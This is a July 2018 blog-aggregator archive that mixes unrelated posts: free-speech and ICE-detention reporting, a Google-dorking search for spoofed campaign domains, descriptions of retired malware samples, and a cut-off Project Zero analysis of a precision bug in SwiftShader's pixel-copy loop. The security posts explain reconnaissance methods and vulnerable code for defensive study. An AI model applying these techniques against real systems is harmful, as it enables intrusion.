Monthly Archives: July 2018

Police are threatening free expression by abusing the law to punish disrespect of law enforcement

Spencer Gallien

In May 2016, a pair of police officers with the New York City Police Department ticketed Shyam Patel for his car’s tinted windows in Times Square. After parking his car, Patel raised his middle finger at them in response.

The NYPD officers then approached Patel and asked for his identification. When Patel asked what crime he was suspected of committing, he alleges that one officer told him, “You cannot gesture as such…”

When Patel insisted that freedom of speech did grant him the right, Patel alleges that the officer said that he could not curse a police officer, grabbed his phone, and again demanded identification. Patel was arrested and charged of disorderly conduct and resisting arrest.

While the charges were later dropped, Patel is suing the officers for violation of his First Amendment right to free expression. No law prohibits swearing at or flipping off a police officer, and it seems clear that law enforcement were in the wrong. But Patel’s case is only the latest incident of police officers abusing the law and their positions of power to punish people critical or disrespectful of law enforcement.

In 2009, a black man returned to his home in Cambridge, Massachusetts from travels abroad to find his door tightly shut. He, along with his taxi driver, forced the door open. Soon after, police arrived to his residence to respond to a reported burglary.

It’s unclear what words exactly were exchanged, but the man was arrested for “loud and tumultuous behavior”. A report by the officer in question indicated that the man merely used harsh language and called the officer a racist.

If the circumstances were different, this incident may not have made the headlines it did—countless people of color are accused of criminal activity for walking upon their own sidewalks or entering into their own homes. But the man was Henry Louis Gates, Jr., a professor at Harvard University and friend of newly elected President Obama. The details of his arrest quickly made waves across the country.

Coverage of the incident focused on concerns of racial profiling, but it was about free speech, too. Gates was arrested not for breaking and entering, but for disorderly conduct after he used harsh language at the officer—just like Patel in New York. Civil liberties attorney Harvey Silverglate has called disorderly conduct law enforcement’s “charge of choice” for when a citizen gives lip to a cop.

These types of cases are a still regular occurrence, despite the landmark 1974 court case Lewis v. New Orleans, where the Supreme Court struck down a city ordinance that outlawed “obscene or opprobrious language toward or with reference to” a police officer. At that time, the court noted that a “properly trained police officer may reasonably be expected to exercise a higher degree of restraint” than private citizens.

Despite the Supreme Court’s clear ruling on this issue, police in Pennsylvania are using the state’s version of a “hate crime” law to prosecute multiple people who say offensive things to them when they are arrested. These laws are intended to protect the vulnerable, but are instead being wielded as a tool by powerful government entities.

Robbie Sanderson, a 52 year old black man, was arrested for retail theft near Pittsburgh in September 2016. During his arrest, he called the police “Nazis” and “skinheads”, and said that “all you cops just shoot people for no reason.” He was charged with felony ethnic intimidation.

Later that year, Senatta Amoroso became agitated at a police station, and was arrested for disorderly conduct and knocked to the ground. According to the ACLU, she yelled while handcuffed in a jail cell: “Death to all you white bitches. I’m going to kill all you white bitches. I hope ISIS kills all you white bitches.” Her six charges included a felony assault charge for hitting an officer in the arm and felony ethnic intimidation.

Sanderson and Amoroso’s cases are just two of many of Pennsylvania law enforcement agents slapping disrespectful arrestees with “hate crime” charges. These people yelled speech that officers found offensive, but they were handcuffed and posed no physical threat to anyone.

Pennsylvania’s “ethnic intimidation” charge works similarly to “hate crime” laws in other states, which generally enhance penalties for perpetrators when victims were targeted for discrimanatory reasons. (“Hate speech” laws technically do not exist in the United States.) Although hate crimes statutes were enacted to protect minorities, they can and are being enforced to protect powerful groups like police.

Nadine Strossen, a professor at New York Law School who was previously president of the ACLU, is not surprised that police are abusing “hate crime” laws to punish disrespect. She thinks these cases, in New York, Massachusetts, and Pennsylvania, all show the same pattern of such laws being wielded against the people they were intended to protect—minorities, and people who lack political power.

She noted that during the civil rights movement, police would charge people protesting injustice with whatever they could—with “resisting arrest”, “disorderly conduct”, or “fighting words”, all of which Strossen calls “catch-all” crimes.

Strossen thinks that the way police abuse “hate crime” laws reveals the inherent problematic nature of legislation that attempts to single out specific identities. “There’s this hydrologic pressure once you have any hate crime or hate speech law. Additional pressures to expand this definition emerge, until the question becomes: ‘Who is not included?'"

In Strossen’s new book, HATE: Why We Should Resist It with Free Speech, not Censorship, she argues that hate speech laws in many European countries have ended up stifling the speech of the vulnerable populations they are intended to protect. She cautions that these recent examples show how hate crime laws can potentially be used for similar purposes in the United States, and that pushing for hate speech laws can backfire.

While the first hate crime laws in the United States were targeted to race and religion, they have expanded to include other categories like gender and sexual orientation. There is concern that powerful groups like police officers are co-opting these laws to shield themselves from scrutiny or criticism. It’s a pattern not unique to the United States—she referenced a recent proposal in South Africa that considered adding “occupation” to a list of protected classes. “Could this include police and politicians, and government officials?”

Some U.S. policymakers are already aiming to officially establish police as a “protected” class of people. This May, the House of Representatives passed the Protect and Serve Act, which would make assaulting a police officer a federal crime. The Senate’s version of this bill even frames attacks on police as federal hate crimes.

These legislative efforts at the federal level follow on the heels of so-called “Blue Lives Matter” bills already passed in states including Kentucky and Louisiana. And while the federal bill applies to physical attacks on police, the state level laws have been enforced upon mere language hostile to police.

During an arrest on unrelated charges in 2016, a man in New Orleans yelled insults at officers and was slapped with additional charges. In a post about this incident, the ACLU of Louisiana wrote that “While racist, sexist, and other similar language may show a lack of respect for law enforcement, it is the job of the police to protect even the rights of those whose opinions they don’t share.”

These bills are not only unnecessary (attacking police officers is already a crime) but also actively harmful.

“The point is clear, especially with regards to the adoption of hate crime statute frameworks: to reinforce the myth of the police as vulnerable and embattled,” Natasha Lennard wrote about “the Protect and Serve Act” for The Intercept.

Recent incidents in Pennsylvania, New York, and Louisiana are part of a long and disturbing history of police abusing the law to punish speech they find unfavorable. It’s deeply concerning for free expression that police feel empowered to add additional charges to arrestees because of the words that they yell while being handcuffed, and legislation that makes police a protected class only amplifies the police’s ability to silence dissent and intimidate critics.

The 2018 Cloud Security Guide: Platforms, Threats, and Solutions

Cloud security is a pivotal concern for any modern business. Learn how the cloud works and the biggest threats to your cloud software and network.


Cloud Security

Cloud security is a pivotal concern for any modern business. Learn how the cloud works and the biggest threats to your cloud software and network. Protect your company’s data with cloud incident response and advanced security services. Minimize cyber threats with the help of Secureworks’ expert guidance.

How To Locate Domains Spoofing Campaigns (Using Google Dorks) #Midterms2018

The government accounts of US Senator Claire McCaskill (and her staff) were targeted in 2017 by APT28 A.K.A. “Fancy Bear” according to an article published by The Daily Beast on July 26th. Senator McCaskill has since confirmed the details.

And many of the subsequent (non-technical) articles that have been published has focused almost exclusively on the fact that McCaskill is running for re-election in 2018. But, is it really conclusive that this hacking attempt was about the 2018 midterms? After all, Senator McCaskill is the top-ranking Democrat on the Homeland Security & Governmental Affairs Committee and also sits on the Armed Services Committee. Perhaps she and her staffers were instead targeted for insights into on-going Senate investigations?

Senator Claire McCaskill's Committee Assignments

Because if you want to target an election campaign, you should target the candidate’s campaign server, not their government accounts. (Elected officials cannot use government accounts/resources for their personal campaigns.) In the case of Senator McCaskill, the campaign server is:

Which appears to be a WordPress site.

Running on an Apache server. Apache error log

And it has various e-mail addresses associated with it. email addresses

That looks interesting, right? So… let’s do some Google dorking!

Searching for “” in URLs while discarding the actual site yielded a few pages of results.

Google dork:

And on page two of those results, this…

Definitely suspicious.

Whats is It’s a domain on the .de TLD (not a TLD itself).

Okay, so… what other interesting domains associated with are there to discover?

How about additional US Senators up for re-election such as Florida Senator Bill Nelson? Yep.

Senator Bob Casey? Yep.

And Senator Sheldon Whitehouse? Yep.

But that’s not all. Democrats aren’t the only ones being spoofed.

Iowa Senate Republicans.

And “Senate Conservatives“.

Hmm. Well, while being no more closer to knowing whether or not Senator McCaskill’s government accounts were actually targeted because of the midterm elections – the domains shown above are definitely shady AF. And enough to give cause for concern that the 2018 midterms are indeed being targeted, by somebody.

(Our research continues.)

Meanwhile, the FBI might want to get in touch with the owners of

Google intends to make GCP the most secure cloud platform

I attended my first Google Next conference last week in San Francisco and came away quite impressed. Clearly, Google is throwing its more and more of its engineering prowess and financial resources at its Google Cloud Platform (GCP) to grab a share of enterprise cloud computing dough and plans to differentiate itself based upon comprehensive enterprise-class cybersecurity feature/functionality.

Google Cloud CEO Diane Greene started her keynote by saying Google intends to lead the cloud computing market in two areas – AI and security. Greene declared that AI and security represent the “#1 worry for customers and the #1 opportunity for GCP.” 

Did ICE detain this Mexican journalist for criticizing U.S. immigration policy?

Gutiérrez and Oscar after release

Emilio Gutiérrez-Soto and his son Oscar speak to the press after being released from an ICE detention facility in El Paso, Texas, on July 26, 2018.

Texas Tribune/Julian Aguilar

Late last night, Mexican journalist Emilio Gutiérrez-Soto and his son Oscar were released from an Immigration and Customs Enforcement (ICE) detention facility in El Paso, Texas. The two had been held in ICE detention for more than seven months, ever since being arrested and nearly deported by ICE agents on December 7, 2017.

The United States government has never offered a convincing reason for arresting Gutiérrez and Oscar in December, or for continuing to detain the two. Gutiérrez and his attorneys have argued that ICE targeted him for arrest in retaliation for his criticism of U.S. immigration policy, in violation of his First Amendment rights — and they have internal ICE documents to back up their case. Freedom of the Press Foundation has obtained the documents and is publishing them for the first time.

This is Gutiérrez’s harrowing story.

"Good morning,” the email began. “Attached is a list of 2,718 non-detained cases that may be candidates for arrest.”

Good morning, Attached is a list of 2,718 non-detained cases that may be candidates for arrest

It was early morning on February 1, 2017, just a few days after President Donald Trump’s inauguration, when an ICE supervisory detention and deportation officer sent that email to other agents in ICE’s El Paso field office. The email carried the subject line, “Non-Detained Target List.” A spreadsheet named “ND Target List.xls” was attached to the email.

An assistant field director in ICE’s El Paso office replied on February 13.

“When u get back, forward this list to the National Criminal Analysis and Targeting Center (NCATC) this is the only FOSC [Fugitive Operations Support Center]. They will run this list and provide info on address location etc …”

One of the many names on the targeting list was “GUTIERREZ SOTO, EMILIO.”

The reason that Gutiérrez was included on that list is a mystery.

Screenshot of ICE emails

Eduardo Beckett, one of Gutiérrez’s attorneys, told Freedom of the Press Foundation that there was no “legitimate law enforcement reason” for Gutiérrez to be on an ICE target list.

“It’s fugitive operations,” he said of the targeting list. “It’s people with felonies. Emilio doesn’t fit that mold.”

Gutiérrez is not a fugitive, and he has no criminal record. He is a Mexican journalist who legally applied for asylum in the United States in 2008, after being threatened by elements of the Mexican military.

So why did ICE target him for possible arrest? Beckett believes it was because Gutiérrez had criticized U.S. immigration policy.

“The only reason he was on that list was because he was a journalist who criticized ICE and the Mexican government,” he said.

Gutiérrez and his son Oscar entered the United States on June 16, 2008.

ICE’s official “Record of Deportable / Inadmissible Alien” for Gutiérrez states that he and Oscar appeared at the Antelope Wells Border Crossing station in New Mexico and formally requested asylum. Gutiérrez was taken to an official “port of entry” — one of the sites where immigrants may legally apply for asylum — and interviewed by a Customs and Border Protection officer. 

Gutiérrez CBP interview recordGutiérrez told the CBP officer that Mexican military police officers had threatened his life after he reported on corruption in the Mexican military.

“The subject continued to state that on May 5, 2008 at approximately midnight several armed military police wearing masks and armed with high caliber weapons entered his house without his permission claiming to look for drugs and weapons,” the ICE record of Gutiérrez’s CBP interview states. “Subject Gutierrez further states that on Saturday June 14, 2008 he was warned by a female friend who claims she overheard military police officers making plans to harm the subject.”

Gutiérrez said that he feared that his life would be in danger if he had to return to Mexico, so ICE gave him a form to fill out and sent him to the El Paso processing center in Texas. His son Oscar, who was still a minor at the time, was detained in a separate facility. In El Paso, Gutiérrez was interviewed by an asylum officer, who assessed that he had a “credible fear” of returning to Mexico, and he was placed into asylum proceedings. He was detained in the El Paso detention center for seven months before being released on parole. He and Oscar, who had been released to family friends in the U.S., reunited and moved to Las Cruces, New Mexico.

The subject continued to state that on May 5, 2008 at approximately midnight several armed military police wearing masks and armed with high caliber weapons entered his house without his permission claiming to look for drugs and weapons.

Years passed without any ruling on their asylum claim, and Gutiérrez and Oscar settled into their new life in New Mexico. Gutiérrez bought a food truck. Though he had not worked as a journalist since fleeing Mexico, he was happy to speak to the press, and he did not hesitate to criticize the United States’ broken asylum system.

“We are talking about an immigration judge and an immigration attorney whose job it is … to keep from expanding the abundance of people looking for protection because of the violence in Mexico,” he told the AP in January 2011, after attending a hearing in his asylum case. “We don’t have a country that accepts us with its laws and regulations even after being aware that we fled Mexico because the Mexican state was persecuting us.”

“We are here because we want to save our lives and it just seems so unfair because a country of freedom and human rights … is ignoring us,” he told the AP a month later, after a ruling on his asylum case was delayed. “We were looking for refuge and they put us in prison.”

In July 2017, immigration judge Robert Hough finally ruled on his nine-year-old asylum claim. Hough ruled that Gutiérrez did not present sufficient evidence to prove that he was targeted for his journalistic work or that his life would be in danger if he returned to Mexico. (According to the Committee to Protect Journalists, more than 60 journalists have been killed in Mexico since June 2008, when Gutiérrez fled to the United States and applied for asylum.)

He simply dismissed all the arguments, put them in the trash can and denied the asylum.

Hough seemed unconvinced that Gutiérrez was really a journalist, in part because Gutiérrez had trouble finding copies of his published newspaper clips to show the judge. Hough denied the asylum claim and ruled that Gutiérrez could be removed from the United States.

“He simply dismissed all the arguments, put them in the trash can and denied the asylum,” Gutiérrez said in an interview with the Knight Center for Journalism in the Americas. “I feel very sad and I am very disappointed in the immigration authorities, especially the policies that the United States exercises.”

On October 4, 2017, Gutiérrez accepted the National Press Club’s prestigious John Aubuchon award on behalf of all Mexican journalists. During his acceptance speech at the club’s black-tie awards gala in Washington, D.C., Gutiérrez accused the U.S. government of hypocrisy for advocating for human rights abroad while denying them at home. Gutiérrez was particularly critical of the United States’ asylum policies.

“Those who seek political asylum in countries like the U.S. encounter the decisions of immigration authorities that barter away international laws,” he said.

As Gutiérrez was publicizing the plight of Mexican journalists and asylum seekers, his legal team tried to get the immigration judge’s decision denying him asylum reversed. They appealed to the Board of Immigration Appeals (BIA), which has the power to review immigration court decisions. But on November 2, 2017, the BIA rejected the appeal because it had been filed late. On November 20, Gutiérrez’s attorney Eduardo Beckett asked the court to reopen the appeal.

Those who seek political asylum in countries like the U.S. encounter the decisions of immigration authorities that barter away international laws.

If the BIA reopened the appeal, then Gutiérrez would be safe. He could not be removed from the country while the appeal was pending. But until the court granted his petition to reopen the appeal, Gutiérrez was at the mercy of ICE. He had to ask the agency to grant him a stay of deportation.

Under the Kafkaesque U.S. immigration law system, ICE officials have the power to issue stays of removal, which prevent the agency from deporting someone. If ICE refuses to issue a stay, then the BIA has an opportunity to step in and issue an emergency stay, which prevents ICE from deporting the person. Crucially, though, the BIA does not have the power to issue an emergency stay until after ICE has already refused to issue a stay and taken someone into custody.

Beckett expected that ICE would officially deny the stay on December 7, when Gutiérrez and his son were scheduled to appear at ICE’s El Paso field office for a routine check-in. He knew that once ICE denied the stay, he could call the BIA and request an emergency stay. Then the BIA would either deny the stay and allow ICE to deport Gutiérrez, or it would grant the stay and order ICE not to deport him.

For assistance in dealing with ICE, Gutiérrez’s legal team reached out to members of Congress. Senator Patrick Leahy of Vermont took a particular interest in the case, and his senate office got in touch with ICE’s congressional liaison to ask about the case.

On November 20, a Leahy aide emailed Gutiérrez’s legal team and said ICE’s congressional liaison had assured her that ICE would “likely make their decision after consulting with BIA.”

Beckett said that ICE told him something similar.

“I had assurances from ICE that they would not try to deport him,” he said. “They told me to bring Emilio and Oscar in and if the stay by ICE was not granted, then ICE would get a ruling from the BIA before taking any action.”

“That was a lie,” he added. “That to me shows the bad faith.”

When Beckett, Gutiérrez, and Oscar arrived at ICE’s El Paso field office on December 7, ICE agents arrested Gutiérrez and Oscar immediately after informing them that they had decided not to grant a stay.

I had assurances from ICE that they would not try to deport him. That was a lie. That to me shows the bad faith.

Beckett called the BIA to petition for an emergency stay of removal, and the court told Beckett that it would call him back as soon as it had ruled on his petition. But ICE had no intention of waiting for the court’s ruling. Agents handcuffed Gutiérrez and Oscar, put the two of them in a car, and started driving toward the border.

As ICE raced to deliver Gutiérrez and Oscar to the border, Gutiérrez’s legal team sent an urgent email to Leahy’s office: “ICE did not wait for the BIA decision. He is being escorted to the bridge. Could you all make a call to please try and stop this? The court has not ruled.”

A Leahy aide wrote back that the senator’s office could not stop ICE: “I am so very sorry to hear this!! There is really nothing else that our office can do to intervene or prevent this.”

According to Beckett, Gutiérrez and Oscar were driven to a parking lot outside of a Border Patrol station, where Gutiérrez was told that Mexican immigration agents were on their way to pick them up and take them back to Mexico.

I am so very sorry to hear this!! There is really nothing else that our office can do to intervene or prevent this.

Before Gutiérrez could be handed over to the Mexican government, the BIA called Beckett back with good news — Gutiérrez and Oscar had been granted an emergency stay of deportation. Beckett immediately called ICE and told them to bring Gutiérrez and Oscar back. The agency refused. The BIA’s emergency order might have prevented ICE from deporting Gutiérrez and his son, but it did not prevent the agency from detaining them.

ICE agents took Gutiérrez and Oscar to an immigration detention facility. They would remain in ICE detention for nearly eight months, and Gutiérrez’s food truck would be stolen while he was still detained.

Gutiérrez’s asylum appeal slowly worked its way through the courts. On December 22, 2017, the BIA decided to reopen Gutiérrez’s appeal. On May 15, 2018, it granted his appeal and remanded his asylum case back to immigration judge Robert Hough, with instructions to consider new evidence and then issue a new decision.

By that time, Gutiérrez’s attorneys were pursuing a new legal strategy.

On March 5, 2018, Gutiérrez filed a petition for habeas corpus in the Western District of Texas federal district court. Habeas corpus — one of the oldest and most fundamental rights in the United States — is the right not to be detained arbitrarily.

Gutiérrez’s habeas corpus petition, which was prepared by Rutgers University’s Institute of International Human Rights law clinic, argued that his ongoing detention by ICE was unconstitutional. The habeas petition advanced a number of arguments for why ICE’s detention of Gutiérrez was unlawful, but the most interesting was the claim that it violated his First Amendment rights to free speech and freedom of the press. Gutiérrez argued that ICE had targeted him for detention because he had publicly criticized the agency in his capacity as a journalist.

As evidence, Gutiérrez’s attorneys noted that Gutiérrez had been arrested by ICE just weeks after publicly criticizing U.S. immigration authorities at the National Press Club awards dinner. They also cited the fact that an ICE official reportedly told National Press Club president Bill McCarren to “tone it down” when it came to advocating for Gutiérrez’s case. (ICE has denied saying this.)

This shows that there was secret emails, a target list, and this was done months before he lost his asylum claim.

Later, Gutiérrez's legal team found their key piece of evidence — the internal ICE emails from February 2017.

On April 30, 2018, National Press Club press freedom fellow Kathy Kiely received copies of the ICE emails in response to a Freedom of Information Act request. She passed them on to Gutiérrez’s legal team, who immediately recognized their significance.

“When Kathy did her FOIA, I told her, this is gold,” Beckett said. “This shows that there was secret emails, a target list, and this was done months before he lost his asylum claim.”

Federal district judge David Guaderrama agreed, citing the ICE emails in his order denying the government’s motion to dismiss the habeas corpus case.

“Respondents [ICE] contend that they detained Petitioners [Gutierrez-Soto and his son] based on a warrant issued after the removal order issued by the immigration judge became final in August 2017,” Guaderrama wrote in a July 10 decision. “However, the emails between ICE officials undermine Respondents’ argument. The emails show that ICE officials were already targeting Mr. Gutierrez-Soto in February 2017. … This is significant because it is before the immigration judge issued the removal order in July 2017, which became final in August 2017.”

Guaderrama concluded that there was sufficient evidence to suggest that “Respondents retaliated against [Petitioners] for asserting their free press rights … [and] Respondents’ reason for detaining Petitioners is a pretext.”

Respondents contend that they detained Petitioners based on a warrant issued after the removal order issued by the immigration judge became final in August 2017. However, the emails between ICE officials undermine Respondents’ argument.

Guaderrama ordered the government to bring Gutiérrez and Oscar to an evidentiary hearing on August 1, 2018, so that he could hear Gutiérrez’s testimony and the government’s defense of his continued detention, and then rule on Gutiérrez’s habeas corpus petition. Guaderrama also denied the government’s motion to delay the hearing and ordered the government to provide Gutiérrez’s legal team with more information about the ICE email thread and the targeting list.

Rather than try to defend ICE’s detention of Gutiérrez and Oscar at a federal court hearing, the government opted to release the two of them.

Beckett credited the federal court with forcing the government’s hand.

“The release of Emilio and his son Oscar is a testament that our Federal Courts protect our Constitutional rights,” he said in a statement. “The Constitution is not just an abstract written document but the cornerstone of our liberty and democracy.”

Now that Gutiérrez is free, he plans to move to Michigan. On May 2, 2018, the University of Michigan awarded him a Knight-Wallace fellowship. The one-year fellowship covers full tuition and health benefits, and includes a $75,000 stipend. Perhaps most importantly, the fellowship will allow Gutiérrez to work alongside other journalists for the first time since he fled Mexico in 2008.

Gutiérrez’s asylum case — which is entirely separate from his habeas corpus case — remains unresolved. In May 2018, the BIA remanded the case back to Hough, the immigration judge who previously denied Gutiérrez’s asylum claim, with instructions to rule on it again after considering new evidence.

Once Gutiérrez moves to Michigan for the Knight-Wallace fellowship, it’s possible that his asylum case will be transferred from Hough, who is based in Texas, to an immigration judge in Michigan. Either way, Gutiérrez’s fate will once again be in the hands of an immigration judge.

If he is denied asylum for a second time, he can try to appeal (again) to the BIA. If the BIA refuses the appeal, ICE will finally be free to deport him and his son.

But if Gutiérrez is granted asylum, then his long ordeal will finally be over, and he will be able to live in the U.S. without fear of being detained or deported by ICE.

Some changes in how libpcap works you should know

I thought I'd document the solution to this problem I had.

The API libpcap is the standard cross-platform way of sniffing packets off the network. It works on Windows (winpcap), macOS, and all the Unixes. It's better than simply opening a "raw socket" on Unix platforms because it takes advantage of higher performance capabilities of the system, including specialized sniffing hardware.

Traditionally, you'd open an adapter with pcap_open(), whose function parameters set options like snap length, promiscuous mode, and timeouts.

However, in newer versions of the API, what you should do instead is call pcap_create(), then set the options individually with calls to functions like pcap_set_timeout(), then once you are ready to start capturing, call pcap_activate().

I mention this in relation to "TPACKET" and pcap_set_immediate_mode().

Over the years, Linux has been adding a "ring buffer" mode to packet capture. This is a trick where a packet buffer is memory mapped between user-space and kernel-space. It allows a packet-sniffer to pull packets out of the driver without the overhead of extra copies or system calls that cause a user-kernel space transition. This has gone through several generations.

One of the latest generations causes the pcap_next() function to wait forever for a packet. This happens a lot on virtual machines where there is no background traffic on the network.

This looks like a bug, but maybe it isn't.  It's unclear what the "timeout" parameter actually means. I've been hunting down the documentation, and curiously, it's not really described anywhere. For an ancient, popular APIs, libpcap is almost entirely undocumented as to what it precisely does. I've tried reading some of the code, but I'm not sure I've come to any understanding.

In any case, the way to resolve this is to call the function pcap_set_immediate_mode(). This causes libpccap to backoff and use an older version of TPACKET such that it'll work as expected, that even on silent networks the pcap_next() function will timeout and return.

I mention this because I fixed this bug in my code. When running inside a VM, my program would never exit. I changed from pcap_open_live() to the pcap_create()/pcap_activate() method instead, adding the setting of "immediate mode", and now things work. Performance seems roughly the same as far as I can tell.

I'm still not certain what's going on here, and there are even newer proposed zero-copy/ring-buffer modes being added to the Linux kernel, so this can change in the future. But in any case, I thought I'd document this in a blogpost in order to help out others who might be encountering the same problem.

Retired Malware Samples: Everything Old is New Again

I’m always on the quest for real-world malware samples that help educate professionals how to analyze malicious software. As techniques and technologies change, I introduce new specimens and retire old ones from the reverse-engineering course I teach at SANS Institute.  Here are some of the legacy samples that were once present in FOR610 materials. Though these malicious programs might not appear relevant anymore, aspects of their functionality are present even in modern malware.

A Backdoor with a Backdoor

To learn fundamental aspects of code-based and behavioral malware analysis, the FOR610 course examined Slackbot at one point. It was an IRC-based backdoor, which it’s author “slim” distributed as a compiled Windows executable without source code.

Dated April 18, 2000, Slackbot came with a builder that allowed its user to customize the name of the IRC server and channel it would use for Command and Control (C2). Slackbot documentation explained how the remote attacker could interact with the infected system over their designated channel and included this taunting note:

“don’t bother me about this, if you can’t figure out how to use it, you probably shouldn’t be using a computer. have fun. –slim”

Those who reverse-engineered this sample discovered that it had undocumented functionality. In addition to connecting to the user-specified C2 server, the specimen also reached out to a hardcoded server that “slim” controlled. The channel #penix channel gave “slim” the ability to take over all the botnets that his or her “customers” were building for themselves.

Turned out this backdoor had a backdoor! Not surprisingly, backdoors continue to be present in today’s “hacking” tools. For example, I came across a DarkComet RAT builder that was surreptitiously bundled with a DarkComet backdoor of its own.

You Are an Idiot

The FOR610 course used an example of a simple malevolent web page to introduce the techniques for examining potentially-malicious websites. The page, captured below, was a nuisance that insulted its visitors with the following message:

When the visitor attempted to navigate away from the offending site, its JavaScript popped up new instances of the page, making it very difficult to leave. Moreover, each instance of the page played the following jingle on the victim’s speakers. “You are an idiot,” the song exclaimed. “Ahahahahaha-hahahaha!” The cacophony of multiple windows blasting this jingle was overwhelming.


A while later I came across a network worm that played this sound file on victims’ computers, though I cannot find that sample anymore. While writing this post, I was surprised to discover a version of this page, sans the multi-window JavaScript trap, residing on Maybe it’s true what they say: good joke never gets old.

Clipboard Manipulation

When Flash reigned supreme among banner ad technologies, the FOR610 course covered several examples of such forms of malware. One of the Flash programs we analyzed was a malicious version of the ad pictured below:

At one point, visitors to legitimate websites, such as MSNBC, were reporting that their clipboards appeared “hijacked” when the browser displayed this ad. The advertisement, implemented as a Flash program, was using the ActionScript setClipboard function to replace victims’ clipboard contents with a malicious URL.

The attacker must have expected the victims to blindly paste the URL into messages without looking at what they were sharing. I remembered this sample when reading about a more recent example of malware that replaced Bitcoin addresses stored in the clipboard with the attacker’s own Bitcoin address for payments.

As malware evolves, so do our analysis approaches, and so do the exercises we use in the FOR610 malware analysis course.  It’s fun to reflect upon the samples that at some point were present in the materials. After all, I’ve been covering this topic at SANS Institute since 2001. It’s also interesting to notice that, despite the evolution of the threat landscape, many of the same objectives and tricks persist in today’s malware world.

REVIEW: Best VPN routers for small business

When selecting VPN routers, small businesses want ones that support the VPN protocols they desire as well as ones that fit their budgets, are easy to use and have good documentation.

We looked at five different models from five different vendors: Cisco, D-Link, and DrayTek, Mikrotik and ZyXEL. Our evaluation called for setting up each unit and weighing the relative merits of their price, features and user-friendliness.

Below is a quick summary of the results:

To read this article in full, please click here

(Insider Story)

Threat Modeling Thursday: 2018

Since I wrote my book on the topic, people have been asking me “what’s new in threat modeling?” My Blackhat talk is my answer to that question, and it’s been taking up the time that I’d otherwise be devoting to the series.

As I’ve been practicing my talk*, I discovered that there’s more new than I thought, and I may not be able to fit in everything I want to talk about in 50 minutes. But it’s coming together nicely.

The current core outline is:

  • What are we working on
    • The fast moving world of cyber
    • The agile world
    • Models are scary
  • What can go wrong? Threats evolve!
    • STRIDE
    • Machine Learning
    • Conflict

And of course, because it’s 2018, there’s cat videos and emoji to augment logic. Yeah, that’s the word. Augment. ????

Wednesday, August 8 at 2:40 PM.

* Oh, and note to anyone speaking anywhere, and especially large events like Blackhat — as the speaker resources say: practice, practice, practice.

Also, something about the stylesheet for this blog break emoji. Try

Drawing Outside the Box: Precision Issues in Graphic Libraries

By Mark Brand and Ivan Fratric, Google Project Zero

In this blog post, we are going to write about a seldom seen vulnerability class that typically affects graphic libraries (though it can also occur in other types of software). The root cause of such issues is using limited precision arithmetic in cases where a precision error would invalidate security assumptions made by the application.

While we could also call other classes of bugs precision issues, namely integer overflows, the major difference is: with integer overflows, we are dealing with arithmetic operations where the magnitude of the result is too large to be accurately represented in the given precision. With the issues described in this blog post, we are dealing with arithmetic operations where the magnitude of the result or a part of the result is too small to be accurately represented in the given precision.

These issues can occur when using floating-point arithmetic in operations where the result is security-sensitive, but, as we’ll demonstrate later, can also occur in integer arithmetic in some cases.

Let’s look at a trivial example:

 float a = 100000000;
 float b = 1;
 float c = a + b;

If we were making the computation with arbitrary precision, the result would be 100000001. However, since float typically only allows for 24 bits of precision, the result is actually going to be 100000000. If an application makes the normally reasonable assumption that a > 0 and b > 0 implies that a + b > a, then this could lead to issues.

In the example above, the difference between a and b is so significant that b completely vanishes in the result of the calculation, but precision errors also happen if the difference is smaller, for example

 float a = 1000;
 float b = 1.1111111;
 float c = a + b;

The result of the above computation is going to be 1001.111084 and not 1001.1111111 which would be the accurate result. Here, only a part of b is lost, but even such results can sometimes have interesting consequences.

While we used the float type in the above examples, and in these particular examples using double would result in more accurate computation, similar precision errors can happen with double as well.

In the remainder of this blog post, we are going to show several examples of precision issues with security impact. These issues were independently explored by two Project Zero members: Mark Brand, who looked at SwiftShader, a software OpenGL implementation used in Chrome, and Ivan Fratric, who looked at the Skia graphics library, used in Chrome and Firefox.


SwiftShader is “a high-performance CPU-based implementation of the OpenGL ES and Direct3D 9 graphics APIs”. It’s used in Chrome on all platforms as a fallback rendering option to work around limitations in graphics hardware or drivers, allowing universal use of WebGL and other advanced javascript rendering APIs on a far wider range of devices.

The code in SwiftShader needs to handle emulating a wide range of operations that would normally be performed by the GPU. One operation that we commonly think of as essentially “free” on a GPU is upscaling, or drawing from a small source texture to a larger area, for example on the screen. This requires computing memory indexes using non-integer values, which is where the vulnerability occurs.

As noted in the original bug report, the code that we’ll look at here is not quite the code which is actually run in practice - SwiftShader uses an LLVM-based JIT engine to optimize performance-critical code at runtime, but that code is more difficult to understand than their fallback implementation, and both contain the same bug, so we’ll discuss the fallback code. This code is the copy-loop used to copy pixels from one surface to another during rendering:

 source->lockInternal((int)sRect.x0, (int)sRect.y0, sRect.slice, sw::LOCK_READONLY, sw::PUBLIC);
 dest->lockInternal(dRect.x0, dRect.y0, dRect.slice, sw::LOCK_WRITEONLY, sw::PUBLIC);

 float w = sRect.width() / dRect.width();
 float h = sRect.height() / dRect.height();

 const float xStart = sRect.x0 + 0.5f * w;
 float y = sRect.y0 + 0.5f * h;
 float x = xStart;

 for(int j = dRect.y0; j < dRect.y1; j++)
   x = xStart;

   for(int i = dRect.x0; i < dRect.x1; i++)
     // FIXME: Support RGBA mask
     dest->copyInternal(source, i, j, x, y, options.filter);

     x += w;

   y += h;


So - what highlights this code as problematic? We know prior to entering this function that all the bounds-checking has already been performed, and that any call to copyInternal with (i, j) in dRect and (x, y) in sRect will be safe.

The examples in the introduction above show cases where the resulting precision error means that a rounding-down occurs - in this case that wouldn’t be enough to produce an interesting security bug. Can we cause floating-point imprecision to result in a larger-than-correct value, leading to (x, y) values that are larger than expected?

If we look at the code, the intention of the developers is to compute the following:

 for(int j = dRect.y0; j < dRect.y1; j++)
   for(int i = dRect.x0; i < dRect.x1; i++)
     x = xStart + (i * w);
     Y = yStart + (j * h);
     dest->copyInternal(source, i, j, x, y, options.filter);

If this approach had been used instead, we’d still have precision errors - but without the iterative calculation, there’d be no propagation of the error, and we could expect the eventual magnitude of the precision error to be stable, and in direct proportion to the size of the operands. With the iterative calculation as performed in the code, the errors start to propagate/snowball into a larger and larger error.

There are ways to estimate the maximum error in floating point calculations; and if you really, really need to avoid having extra bounds checks, using this kind of approach and making sure that you have conservative safety margins around those maximum errors might be a complicated and error-prone way to solve this issue. It’s not a great approach to identifying the pathological values that we want here to demonstrate a vulnerability; so instead we’ll take a brute-force approach.

